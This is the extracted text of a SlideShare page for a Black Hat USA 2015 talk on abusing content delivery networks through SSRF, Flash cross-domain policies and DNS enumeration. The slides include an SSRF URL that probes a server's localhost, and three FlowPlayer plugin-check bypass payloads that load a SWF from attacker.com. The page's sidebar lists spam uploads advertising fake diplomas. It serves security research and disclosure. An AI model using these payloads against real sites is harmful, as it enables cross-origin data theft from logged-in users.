Codefest2015Codefest2015
Codefest2015
Denis Kolegov
 
Meeting 4 : proxy
Meeting 4 : proxyMeeting 4 : proxy
Meeting 4 : proxy
Syaiful Ahdan
 
Cloud Jacking™
Cloud Jacking™Cloud Jacking™
Cloud Jacking™
Bryan McAninch
 
CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)
CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)
CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)
PROIDEA
 
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOracle database threats - LAOUC Webinar
Oracle database threats - LAOUC Webinar
Osama Mustafa
 
Training Webinar: Enterprise application performance with server push technol...
Training Webinar: Enterprise application performance with server push technol...Training Webinar: Enterprise application performance with server push technol...
Training Webinar: Enterprise application performance with server push technol...
OutSystems
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People
SPC Adriatics
 
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
Amazon Web Services
 
MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the Cloud
MongoDB
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud Security
MongoDB
 
Deploy secure, scalable, and highly available web apps with Azure Front Door ...
Deploy secure, scalable, and highly available web apps with Azure Front Door ...Deploy secure, scalable, and highly available web apps with Azure Front Door ...
Deploy secure, scalable, and highly available web apps with Azure Front Door ...
Stamo Petkov
 
CNIT 127: L9: Web Templates and .NET
CNIT 127: L9: Web Templates and .NETCNIT 127: L9: Web Templates and .NET
CNIT 127: L9: Web Templates and .NET
Sam Bowne
 

Similar to Black hat usa_2015-bypass_surgery-6_aug2015 (20)

Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...
Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...
Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...
 
Cloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaksCloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaks
 
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
 
ICANN 51: Name Collision
ICANN 51: Name CollisionICANN 51: Name Collision
ICANN 51: Name Collision
 
Flashack
FlashackFlashack
Flashack
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QA
 
Codefest2015
Codefest2015Codefest2015
Codefest2015
 
Meeting 4 : proxy
Meeting 4 : proxyMeeting 4 : proxy
Meeting 4 : proxy
 
Cloud Jacking™
Cloud Jacking™Cloud Jacking™
Cloud Jacking™
 
CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)
CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)
CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)
 
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOracle database threats - LAOUC Webinar
Oracle database threats - LAOUC Webinar
 
Training Webinar: Enterprise application performance with server push technol...
Training Webinar: Enterprise application performance with server push technol...Training Webinar: Enterprise application performance with server push technol...
Training Webinar: Enterprise application performance with server push technol...
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People
 
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
 
MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the Cloud
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud Security
 
Deploy secure, scalable, and highly available web apps with Azure Front Door ...
Deploy secure, scalable, and highly available web apps with Azure Front Door ...Deploy secure, scalable, and highly available web apps with Azure Front Door ...
Deploy secure, scalable, and highly available web apps with Azure Front Door ...
 
CNIT 127: L9: Web Templates and .NET
CNIT 127: L9: Web Templates and .NETCNIT 127: L9: Web Templates and .NET
CNIT 127: L9: Web Templates and .NET
 

Recently uploaded

假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
cuobya
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
Javier Lasa
 
Explore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories SecretlyExplore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories Secretly
Trending Blogers
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
vmemo1
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
Arif0071
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
JeyaPerumal1
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
CIOWomenMagazine
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
zoowe
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
3ipehhoa
 
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
cuobya
 

Recently uploaded (20)

假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
 
Explore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories SecretlyExplore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories Secretly
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
 
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
 

Black hat usa_2015-bypass_surgery-6_aug2015

  • 1. Bypass Surgery Abusing Content Delivery Networks With Server Side Request Forgery (SSRF), Flash, and DNS BY MIKE BROOKS AND MATTHEW BRYANT August 6, 2015
  • 2. 22 Security Consultant for Bishop Fox Maintainer of The Hacker Blog: https://thehackerblog.com @IAmMandatory Signal Fingerprint 05 d4 6b db 51 31 9b 43 b6 6b c6 96 91 fb 3c 1e 60 3c 93 6b 4e 1f 55 8e 54 9a 93 e0 a4 c3 ad 99 34 HAS BEEN KNOWN TO HACK THINGS Matthew Bryant (mandatory)
  • 4. 44 • Almost all modern web applications depend on third-party services to operate. • These third parties are implicitly trusted and work invisibly in the background. WORKING BUT TANGLED Interconnected Services
  • 5. 55 • The web consists of many content delivery networks (CDNs) that deliver content via large distributed networks. • When you visit your favorite sites, you unknowingly trust these services. ONE PAGE SPAWNING MANY REQUESTS Content Delivery Networks
  • 6. 66 ONE PAGE SPAWNING MANY REQUESTS How People Think the Web Works… foxnews.com homepage?
  • 7. 77 ONE PAGE SPAWNING MANY REQUESTS How People Think the Web Works… Here you go!
  • 8. 88 ONE PAGE SPAWNING MANY REQUESTS How It Actually Works…
  • 9. 99 • Many sites on the Internet trust a short list of CDNs to serve their content. • What happens when a vulnerability is found in a CDN provider? • The impact is severe and far reaching. WHAT COULD GO WRONG Many Sites Trusting a Few CDNs
  • 13. 1313 TOOLS DNS meta-query spider • https://github.com/TheRook/subbrute Search though a mass-reverse lookup DB • https://dnsdumpster.com/ Brute-force forward-lookups • https://github.com/darkoperator/dnsrecon Profiling With DNS
  • 14. 1414 SubBrute 2.0 Source: https://github.com/TheRook/subbrute • Through (~3 hours) – Authoritative NS used by default ./subbrute.py google.com –p –s names_large • Very Fast (~8 minutes) – Using Open Resolvers ./subbrute.py google.com –p –r resolvers.txt
  • 15. 1515 QUERIES ABOUT QUERIES DNS Meta Queries AXFR - Transfers entire zone file from the master name server to “secondary name servers” ANY - Returns all records of all types known to the name server. If the name server does not have any information on the name, the request will be forwarded on.
  • 16. 1616 DNS META QUERY dig any google.com @8.8.8.8
  • 17. 1717 DNS META QUERY SPIDER ./subbrute.py google.com –p –o goog.csv
  • 18. 1818 Types of Records Found on Google.com Total Records: 3056 Total Subdomains: 358 A, 2379 CNAME, 231 AAAA, 255 MX, 146 NS, 12 SRV, 22 SOA, 3 NOERROR, 7 TYPE257, 1 A CNAME AAAA MX NS SRV SOA NOERROR TYPE257 0 500 1000 1500 2000 2500
  • 19. 1919 DNS RECORD TYPE 257 RFC-6844: DNS Certificate Pinning Source: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization
  • 20. 2020 DNS Record Type 257 http://arstechnica.com/security/2015/04/google-chrome-will-banish-chinese- certificate-authority-for-breach-of-trust/
  • 21. 2121 RFC-6698: DNSSEC PKI Source: https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities
  • 22. 2222 VOIP, CALENDAR, AND LDAP SERVICES SRV Record Enumeration • _caldav._tcp.google.com,SRV,5 0 80 calendar.google.com. • _jabber-client._tcp.google.com,SRV,20 0 5222 alt1.xmpp.l.google.com. • _ldap._tcp.google.com,SRV,5 0 389 ldap.google.com. • _xmpp-client._tcp.google.com,SRV,5 0 5222 xmpp.l.google.com._xmpp- • server._tcp.google.com,SRV,5 0 5269 xmpp- server.l.google.com.
  • 23. 2323 SOP BYPASS AT SCALE Akamai EdgeSuite - DNS static.fbcdn.com static.facebook.com.edgesuite.net. a1860.g.akamai.net. 64.145.75.11
  • 24. 2424 VOIP, CALENDAR, AND LDAP SERVICES subbrute - Internal Network Assessment subbrute.exe MicrosoftDomain.com –r internal_resolvers.txt –s names_large.txt ... 19 domain controllers found… _ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 rangers.LegitBank.com. _ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 sharks.DOMAIN.com. _ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 canucks.DOMAIN.com.
  • 25. 2525 A Common DNS Misconfiguration Source: https://cwe.mitre.org/data/definitions/203.html
  • 26. 2626 NOERROR RESPONSES ./subbrute.py LegitBank.com –p –o comp _domainkey.LegitBank.com,NOERROR, sci.LegitBank.com,NOERROR, vcs.LegitBank.com,NOERROR, dev.LegitBank.com,NOERROR, internal.LegitBank.com,NOERROR
  • 27. 2727 INTERNAL ADDRESSES NOERROR? cat comp | grep NOERROR > comp.ne ./subbrute.py –t comp.ne –p –o comp.internal ldap.sci.LegitBank.com,CNAME,prod-ldap-proxy- vip.sci.LegitBank.com. prod-ldap-proxy-vip.sci.LegitBank.com, CNAME,prod- ldap-proxy-vip-sv4.sci.LegitBank.com. prod-ldap-proxy-vip-sv4.sci.LegitBank.com, A,10.30.40.40
  • 28. 2828 CONTINUED NOERROR? ./subbrute.py –t comp.ne –p –o comp.internal … accounting.internal.LegitBank.com, A,10.30.0.41 monitoring.internal.LegitBank.com, A,10.30.0.42
  • 30. 3030 CROSSING THE ORIGIN BOUNDARY Server Trust LegitBank.com
  • 31. 3131 FIRST TWO HITS ARE SSRF Search for “Cross Domain Proxy”
  • 32. 3232 TOOLS Netcat for the 21st century • https://nmap.org/ncat/ HTTP Request and Response Service • http://httpbin.org/ Burp Collaborator • http://blog.portswigger.net/2015/04/introducing- burp-collaborator.html SSRF tools
  • 33. 3333 Access to the Web Server’s localhost http://legitbank.com/proxy.php?csurl=http://localhost:631
  • 34. 3434 Access to the Web Server’s localhost
  • 35. 3535 Access to Internal Network Hardware
  • 36. 3636 CROSSING THE ORIGIN BOUNDARY Server Trust LegitBank.com www.LegitBank.com accounting.internal.LegitBank.com
  • 37. 3737 TOOLS SSRF In A Load Balancer
  • 38. 3838 PATHS TO EXPLOITATION • Can I access a protected resource? • XXE DTD system to make HTTP Requests? • Internal IP Address or Hosts? • “Virtual Private Cloud,” S3, MongoDB HTTP interface? • Can I connect to a host I control? • Can I load arbitrary content such as a SWF on the domain? SSRF Questions
  • 40. 4040 Crossdomain.xml Proof of Concept Tool • https://thehackerblog.com/crossdomain/ FlashHTTPRequest • https://github.com/mandatoryprogrammer/FlashHTTPReque st JPEXS • https://www.free-decompiler.com/flash/ SEARCHDIGGITY • http://www.bishopfox.com/resources/tools/google-hacking- diggity/attack-tools/ MEN HAVE BECOME TOOLS OF THEIR TOOLS Tools
  • 41. JAVASCRIPT VS FLASH REMOTE INCLUSION CROSSING THE ORIGIN BOUNDARY
  • 42. 4242 • An origin is a combination of port, scheme, and domain. • Origins separate sites from accessing each other’s data due to the Same Origin Policy (SOP). • For example, a script executing in the context of the http://example.com origin could not read data from http://thirdparty.com because the origins do not match. CROSSING THE ORIGIN BOUNDARY What’s an origin?
  • 43. 4343 JavaScript • Remote JavaScript includes execute in the context of the including site’s origin. Flash • Remote includes execute in the context of the hosting site’s origin. CROSSING THE ORIGIN BOUNDARY Differences between JavaScript and Flash
  • 44. 4444 CROSSING THE ORIGIN BOUNDARY Remote JavaScript Inclusion Example http://legitbank.com/ <!DOCTYPE html> <html> <head></head> <body> <h1>Script Origin:<p id="origin"></p></h1> <script src="http://thirdparty.com/example.js"></script> </body> </html>
  • 45. 4545 CROSSING THE ORIGIN BOUNDARY Remote JavaScript Inclusion Example http://thirdparty.com/example.js document.getElementById(‘origin’).innerText = location.origin
  • 46. 4646 CROSSING THE ORIGIN BOUNDARY Remote JavaScript Inclusion
  • 47. 4747 CROSSING THE ORIGIN BOUNDARY Remote Flash Inclusion Example http://legitbank.com/ <!DOCTYPE html> <html> <head></head> <body> <object type=“application/x-shockwave-flash” data=“http://thirdparty.com/example.swf”> </body> </html>
  • 48. 4848 CROSSING THE ORIGIN BOUNDARY Remote Flash Inclusion Example http://thirdparty.com/secrets.txt Secrets on thirdparty.com!
  • 49. 4949 • Before Flash preforms a cross-origin request, the target site’s crossdomain.xml file is checked. • This file permits third-party sites to perform authenticated requests via allow-access-from domain tags. • Wildcard usage is allowed and is commonplace. CROSSING THE ORIGIN BOUNDARY Flash Cross-Domain Policies
  • 50. 5050 CROSSING THE ORIGIN BOUNDARY Example Crossdomain.xml File http://legitbank.com/crossdomain.xml <cross-domain-policy> <allow-access-from domain=“*.legitbank.com”> <allow-access-from domain=“*.thirdparty.com”> </cross-domain-policy>
  • 51. 5151 75% 25% USES DOESN'T USE *NOT INCLUDING SITES WITH JUST A WILDCARD ENTRY Usage of domain wildcards (*.domain.com)? *Taken from a survey of Alexa top 10,000 sites
  • 52. 5252 • Enumerate all subdomains of a domain name: • ./subbrute.py thirdparty.com • ./subbrute.py legitbank.com • An arbitrary SWF upload or vulnerable SWF on any domain will compromise the security of legitbank.com. CROSSING THE ORIGIN BOUNDARY Enumerating Subdomains With Subbrute
  • 54. 5454 • FlowPlayer is a Flash application that plays videos and allows the loading of arbitrary Flash plugins. DON’T HATE THE PLAYER FlowPlayer
  • 55. 5555 • Problematically, FlowPlayer versions below 3.2.16 allowed the loading of plugins from arbitrary domains. • This means an attacker can hijack the functionality of FlowPlayer by loading arbitrary plugins into the player. DON’T HATE THE PLAYER FlowPlayer
  • 56. 5656 DON’T HATE THE PLAYER FlowPlayer http://legitbank.com/ flowplayer("player", vulnerable_player,{ plugins: { controls: null, SimpleHelloWorld: { url: 'http://thirdparty.com/plugin.swf', } } });
  • 57. 5757 • With the release of FlowPlayer 3.2.18 new code was introduced to prevent loading of arbitrary plugins. • This code parses the plugin URL to check if it’s trusted before loading it. • However, we found three bypasses by auditing the plugin checking code. DON’T HATE THE PLAYER Multiple FlowPlayer Bypasses
  • 58. 5858
  • 59. 5959 DON’T HATE THE PLAYER FlowPlayer Bypass #1 – The Check public static function isLocal(url:String):Boolean { trace("localDomain? " + url); if (url.indexOf("http://localhost") == 0) return true; if (url.indexOf("http://localhost:") == 0) return true; if (url.indexOf("file://") == 0) return true; if (url.indexOf("http://127.0.0.1") == 0) return true; if (url.indexOf("http://") == 0) return false; if (url.indexOf("/") == 0) return true; return false; }
  • 60. 6060 DON’T HATE THE PLAYER FlowPlayer Bypass #1 – The Check public static function isLocal(url:String):Boolean { trace("localDomain? " + url); if (url.indexOf("http://localhost") == 0) return true; if (url.indexOf("http://localhost:") == 0) return true; if (url.indexOf("file://") == 0) return true; if (url.indexOf("http://127.0.0.1") == 0) return true; if (url.indexOf("http://") == 0) return false; if (url.indexOf("/") == 0) return true; return false; }
  • 61. 6161 DON’T HATE THE PLAYER FlowPlayer Bypass #1 – The Bypass http://attacker.com/ flowplayer("player", vulnerable_player,{ plugins: { controls: null, SimpleHelloWorld: { url: ’//attacker.com/exploit.swf', } } });
  • 62. 6262 DON’T HATE THE PLAYER FlowPlayer Bypass #2 – The Check public static function getDomain(url:String):String { var schemeEnd:int = getSchemeEnd(url); var domain:String = url.substr(schemeEnd); var endPos:int = getDomainEnd(domain); return domain.substr(0, endPos).toLowerCase(); } internal static function getSchemeEnd(url:String):int { var pos:int = url.indexOf("///"); if (pos >= 0) return pos + 3; pos = url.indexOf("//"); if (pos >= 0) return pos + 2; return 0; }
  • 63. 6363 DON’T HATE THE PLAYER FlowPlayer Bypass #2 – The Check public static function getDomain(url:String):String { var schemeEnd:int = getSchemeEnd(url); var domain:String = url.substr(schemeEnd); var endPos:int = getDomainEnd(domain); return domain.substr(0, endPos).toLowerCase(); } internal static function getSchemeEnd(url:String):int { var pos:int = url.indexOf("///"); if (pos >= 0) return pos + 3; pos = url.indexOf("//"); if (pos >= 0) return pos + 2; return 0; }
  • 64. 6464 DON’T HATE THE PLAYER FlowPlayer Bypass #2 – The Bypass http://attacker.com/ flowplayer("player", vulnerable_player,{ plugins: { controls: null, SimpleHelloWorld: { url: ’http://attacker.com///legitbank.com/../flowplayer/plugin. swf', } } });
  • 65. 6565 DON’T HATE THE PLAYER FlowPlayer Bypass #3 – The Bypass http://attacker.com/ flowplayer("player", vulnerable_player,{ plugins: { controls: null, SimpleHelloWorld: { url: ’http://legitbank.com/openredirect.php?url=http://attacker.com/flowplayer/plu gin.swf', } } });
  • 66. 6666 There are probably many more, but three is a cool number. DON’T HATE THE PLAYER More bypasses…
  • 68. 6868 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
  • 69. 6969 CROSSING THE ORIGIN BOUNDARY Flowplayer Users logs in to legitbank.com attacker.com legitbank.com
  • 70. 7070 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
  • 71. 7171 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
  • 72. 7272 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
  • 73. 7373 CROSSING THE ORIGIN BOUNDARY Flowplayer ATTACKER HIJACKS SWF WITH PLUGIN attacker.com legitbank.com
  • 74. 7474 CROSSING THE ORIGIN BOUNDARY Flowplayer attacker.com legitbank.com
  • 77. 7777 • EdgeSuite.net is used in Akamai’s Content Delivery Network (CDN). • Part of the FreeFlow service, Akamai’s legacy content delivery network. • The setup process for FreeFlow involves pointing DNS records to Akamai’s network. • Instead of hitting your site directly the Akamai service acts as a caching and distribution service. SOP BYPASS AT SCALE Akamai EdgeSuite
  • 78. 7878 SOP BYPASS AT SCALE Akamai EdgeSuite - DNS akamai.example.com x.example.com.edgesuite.net. a1337.g.akamai.net. 184.25.56.98
  • 79. 7979 SOP BYPASS AT SCALE Akamai EdgeSuite akamai.example.com example.com
  • 80. 8080 SOP BYPASS AT SCALE Akamai EdgeSuite akamai.example.com example.com
  • 81. 8181 SOP BYPASS AT SCALE Akamai EdgeSuite akamai.example.com example.com
